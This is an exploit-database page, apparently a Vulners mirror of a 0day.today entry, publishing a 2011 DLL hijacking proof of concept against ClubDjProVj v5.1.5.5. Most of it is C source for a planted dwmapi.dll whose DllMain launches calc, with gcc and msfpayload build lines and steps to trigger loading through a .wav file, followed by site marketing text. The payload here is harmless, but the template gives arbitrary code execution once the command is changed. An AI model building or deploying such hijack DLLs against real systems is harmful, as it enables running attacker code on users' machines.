Lucene search
K

ClubDjProVj v5.1.5.5 dll hijacking dwmapi.dll

🗓️ 19 Apr 2011 00:00:00Reported by Aaftab paulType 
zdt
 zdt
🔗 0day.today👁 14 Views

ClubDjProVj v5.1.5.5 dll hijacking vulnerabilit

Code
/* ClubDjProVj v5.1.5.5 dll hijacking dwmapi.dll
Author Aaftab paul
Publisher ClubDJPro.com
Vuln DLL => dwmapi.dll
Web => http://aslitsecurity.com
blog => http://aslitsecurity.blogspot.com
Extebtions wav
gcc -shared -o dwmapi.dll test.c
or
msfpayload windows/exec CMD=calc.exe D > dwmapi.dll
Tested on XP SP2
To load right click on file name of above ext. And select openwith=>browse=>ClubDjProVj

*/

#include <windows.h>

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  hax();
  return 0;
}



#  0day.today [2018-03-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation